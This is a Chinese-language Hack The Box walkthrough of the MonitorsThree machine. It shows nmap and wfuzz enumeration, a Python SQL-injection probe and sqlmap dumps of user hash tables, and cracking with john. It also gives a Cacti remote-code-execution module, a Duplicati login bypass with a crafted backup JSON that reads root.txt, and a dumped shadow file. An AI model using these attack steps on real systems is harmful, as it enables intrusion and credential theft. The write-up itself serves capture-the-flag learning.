扫描靶机
nmap -T4 -A -v 10.10.11.30
就两三个端口,老规矩先看80端口
80端口会重定向到monitorsthree.htb域名,跑一下子域名
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://monitorsthree.htb/" -H "Host: FUZZ.monitorsthree.htb" --hc 404 --hl 337
跑出来了一个cacti子域名,写到hosts,然后打开
有点眼熟啊,下面写出了版本cacit 1.2.26,可以找到poc
https://packetstormsecurity.com/files/176995/Cacti-pollers.php-SQL-Injection-Remote-Code-Execution.html
https://github.com/Cacti/cacti/security/advisories/GHSA-vr3c-38wh-g855
根据上面的poc,说是有sql注入攻击,先找到注入点
在http://monitorsthree.htb/forgot_password.php那里可以找到一个注入点
import requests# 目标URL(假设为表单提交的URL)url = 'http://monitorsthree.htb/forgot_password.php'# SQL注入测试的数据payloads = ["' OR '1'='1","' OR '1'='1' --","' OR '1'='1' /*"]# 发送请求并显示响应for payload in payloads:# 构造带有注入代码的数据data = {'username': payload}response = requests.post(url, data=data)print(f"Testing payload: {payload}")print(f"Status Code: {response.status_code}")if response.status_code == 200:print("Possible SQL Injection!")else:print("Failed to inject SQL.")# 显示响应头print("Response Headers:")for header, value in response.headers.items():print(f"{header}: {value}")# 显示响应内容print("Response Content:")print(response.text) # 或使用 response.content.decode() 如果响应是二进制的print("n") # 输出一个空行以便区分不同的测试结果
然后使用burpsuite抓包,保存,再使用sqlmap攻击
sqlmap -u http://monitorsthree.htb/forgot_password.php --forms --crawl 2 --dbs --all --batch
太卡了,直接给出数据库
sqlmap -u http://monitorsthree.htb/forgot_password.php --forms --crawl 2 -D monitorsthree_db -T users --dump --batch
+----+-----------+-----------------------------+----------------------------------+-------------------+-----------------------+------------+------------+-----------+| id | username | email | password | name | position | dob | start_date | salary |+----+-----------+-----------------------------+----------------------------------+-------------------+-----------------------+------------+------------+-----------+| 2 | admin | [email protected] | 31a181c8372e3afc59dab863430610e8 | Marcus Higgins | Super User | 1978-04-25 | 2021-01-12 | 320800.00 || 5 | mwatson | [email protected] | c585d01f2eb3e6e1073e92023088a3dd | Michael Watson | Website Administrator | 1985-02-15 | 2021-05-10 | 75000.00 || 6 | janderson | [email protected] | 1e68b6eb86b45f6d92f8f292428f77ac | Jennifer Anderson | Network Engineer | 1990-07-30 | 2021-06-20 | 68000.00 || 7 | dthompson | [email protected] | 633b683cc128fe244b00f176c8a950f5 | David Thompson | Database Manager | 1982-11-23 | 2022-09-15 | 83000.00 |+----+-----------+-----------------------------+----------------------------------+-------------------+-----------------------+------------+------------+-----------+
然后使用rockyou字典破解
john --wordlist=/usr/share/wordlists/rockyou.txt hash --format=Raw-MD5
成功跑出密码,密码是:greencacti2001,在http://monitorsthree.htb/那里登录
https://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88
可以使用msf的这个模块getshell
https://github.com/rapid7/metasploit-framework/pull/19196
成功拿到了shell,在/var/www/html/cacti底下有个sql文件,将其下载下来
下载后导入本地,可以获得登录密码
+----+----------+----------------------------------+-------+---------------+---------------+----------------------+-----------------+-----------+-----------+--------------+----------------+------------+---------------+--------------+--------------+------------------------+---------+------------+-----------+------------------+--------+-----------------+----------+-------------+| id | username | password | realm | full_name | email_address | must_change_password | password_change | show_tree | show_list | show_preview | graph_settings | login_opts | policy_graphs | policy_trees | policy_hosts | policy_graph_templates | enabled | lastchange | lastlogin | password_history | locked | failed_attempts | lastfail | reset_perms |+----+----------+----------------------------------+-------+---------------+---------------+----------------------+-----------------+-----------+-----------+--------------+----------------+------------+---------------+--------------+--------------+------------------------+---------+------------+-----------+------------------+--------+-----------------+----------+-------------+| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 | 0 | Administrator | | on | on | on | on | on | on | 2 | 1 | 1 | 1 | 1 | on | -1 | -1 | -1 | | 0 | 0 | 0 || 3 | guest | 43e9a4ab75570f5b | 0 | Guest Account | | on | on | on | on | on | 3 | 1 | 1 | 1 | 1 | 1 | | -1 | -1 | -1 | | 0 | 0 | 0 |+----+----------+----------------------------------+-------+---------------+---------------+----------------------+-----------------+-----------+-----------+--------------+----------------+------------+---------------+--------------+--------------+------------------------+---------+------------+-----------+------------------+--------+-----------------+----------+-------------+
但是登不上去,只能继续寻找,在/var/www/html/cacti/include里面有个config.php,点进去可以看到账号
登录进去是cacti的数据库,在这里可以找到marcus哈希
+----+----------+--------------------------------------------------------------+-------+---------------+--------------------------+----------------------+-----------------+-----------+-----------+--------------+----------------+------------+---------------+--------------+--------------+------------------------+---------+------------+-----------+------------------+--------+-----------------+----------+-------------+| id | username | password | realm | full_name | email_address | must_change_password | password_change | show_tree | show_list | show_preview | graph_settings | login_opts | policy_graphs | policy_trees | policy_hosts | policy_graph_templates | enabled | lastchange | lastlogin | password_history | locked | failed_attempts | lastfail | reset_perms |+----+----------+--------------------------------------------------------------+-------+---------------+--------------------------+----------------------+-----------------+-----------+-----------+--------------+----------------+------------+---------------+--------------+--------------+------------------------+---------+------------+-----------+------------------+--------+-----------------+----------+-------------+| 1 | admin | $2y$10$tjPSsSP6UovL3OTNeam4Oe24TSRuSRRApmqf5vPinSer3mDuyG90G | 0 | Administrator | [email protected] | | | on | on | on | on | 2 | 1 | 1 | 1 | 1 | on | -1 | -1 | -1 | | 0 | 0 | 436423766 || 3 | guest | $2y$10$SO8woUvjSFMr1CDo8O3cz.S6uJoqLaTe6/mvIcUuXzKsATo77nLHu | 0 | Guest Account | [email protected] | | | on | on | on | | 1 | 1 | 1 | 1 | 1 | | -1 | -1 | -1 | | 0 | 0 | 3774379591 || 4 | marcus | $2y$10$Fq8wGXvlM3Le.5LIzmM9weFs9s6W2i1FLg3yrdNGmkIaxo79IBjtK | 0 | Marcus | [email protected] | | on | on | on | on | on | 1 | 1 | 1 | 1 | 1 | on | -1 | -1 | | | 0 | 0 | 1677427318 |+----+----------+--------------------------------------------------------------+-------+---------------+--------------------------+----------------------+-----------------+-----------+-----------+--------------+----------------+------------+---------------+--------------+--------------+------------------------+---------+------------+-----------+------------------+--------+-----------------+----------+-------------+3 rows in set (0.000 sec)
john --wordlist=/home/kali/rockyou.txt marcus
成功破解出密码,妈的,这坤八密码这么简单的吗,密码是:12345678910,直接登录ssh
发现权限问题不能登录,只能通过www用户提权,成功拿到了user flag
查看后台端口有个8200,将其代理出来
将其代理出来
可以看到是需要登录的,可以参考这篇文章,先抓包
https://medium.com/@STarXT/duplicati-bypassing-login-authentication-with-server-passphrase-024d6991e9ee
https://github.com/duplicati/duplicati/issues/5197
在这里可以找到解码的关键代码
然后使用浏览器后台控制输入,解码
直接使用生成的登录
先add backup,然后上传一个json
{"CreatedByVersion": "2.0.8.1","Schedule": null,"Backup": {"ID": "26","Name": "pwned","Description": "","Tags": [],"TargetURL": "file:///source/home/marcus/","DBPath": "/config/AWFVXLECNV.sqlite","Sources": ["/source/root/root.txt"],"Settings": [{"Filter": "","Name": "encryption-module","Value": "","Argument": null},{"Filter": "","Name": "compression-module","Value": "zip","Argument": null},{"Filter": "","Name": "dblock-size","Value": "50mb","Argument": null},{"Filter": "","Name": "--no-encryption","Value": "true","Argument": null}],"Filters": [],"Metadata": {"LastBackupDate": "20240825T091022Z","BackupListCount": "1","TotalQuotaSpace": "8350261248","FreeQuotaSpace": "2258087936","AssignedQuotaSpace": "-1","TargetFilesSize": "1961","TargetFilesCount": "3","TargetSizeString": "1.92 KB","SourceFilesSize": "33","SourceFilesCount": "1","SourceSizeString": "33 bytes","LastBackupStarted": "20240825T091022Z","LastBackupFinished": "20240825T091022Z","LastBackupDuration": "00:00:00.3523360","LastCompactDuration": "00:00:00.0011050","LastCompactStarted": "20240825T091022Z","LastCompactFinished": "20240825T091022Z","LastRestoreDuration": "00:00:00.1340530","LastRestoreStarted": "20240825T091048Z","LastRestoreFinished": "20240825T091049Z"},"IsTemporary": false},"DisplayNames": {"/source/root/root.txt": "root.txt"}}
一直默认,然后直接保存
成功新建了一个backup选项,刷新一下,然后run now ,在Restore
成功拿到了root flag
root:$y$j9T$3TDQ3GS5lSkNwiN4EsxVB/$Jyu3CWLTQ4mIypw/03JOtPle6vdpaoY/x6J9brbV9P4:19869:0:99999:7:::daemon:*:19579:0:99999:7:::bin:*:19579:0:99999:7:::sys:*:19579:0:99999:7:::sync:*:19579:0:99999:7:::games:*:19579:0:99999:7:::man:*:19579:0:99999:7:::lp:*:19579:0:99999:7:::mail:*:19579:0:99999:7:::news:*:19579:0:99999:7:::uucp:*:19579:0:99999:7:::proxy:*:19579:0:99999:7:::www-data:*:19579:0:99999:7:::backup:*:19579:0:99999:7:::list:*:19579:0:99999:7:::irc:*:19579:0:99999:7:::gnats:*:19579:0:99999:7:::nobody:*:19579:0:99999:7:::_apt:*:19579:0:99999:7:::systemd-network:*:19579:0:99999:7:::systemd-resolve:*:19579:0:99999:7:::messagebus:*:19579:0:99999:7:::systemd-timesync:*:19579:0:99999:7:::pollinate:*:19579:0:99999:7:::sshd:*:19579:0:99999:7:::syslog:*:19579:0:99999:7:::uuidd:*:19579:0:99999:7:::tcpdump:*:19579:0:99999:7:::tss:*:19579:0:99999:7:::landscape:*:19579:0:99999:7:::fwupd-refresh:*:19579:0:99999:7:::usbmux:*:19861:0:99999:7:::marcus:$y$j9T$E2hoLeuzugmRkxli4l2tW0$yW1Z2shW601aB1eqvybmrTri2Z6X6l9Wz5IIhK89Dd2:19861:0:99999:7:::lxd:!:19861::::::mysql:!:19861:0:99999:7:::Debian-snmp:!:19861:0:99999:7:::dnsmasq:*:19863:0:99999:7:::_laurel:!:19954::::::
原文始发于微信公众号(Jiyou too beautiful):HTB-MonitorsThree笔记
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论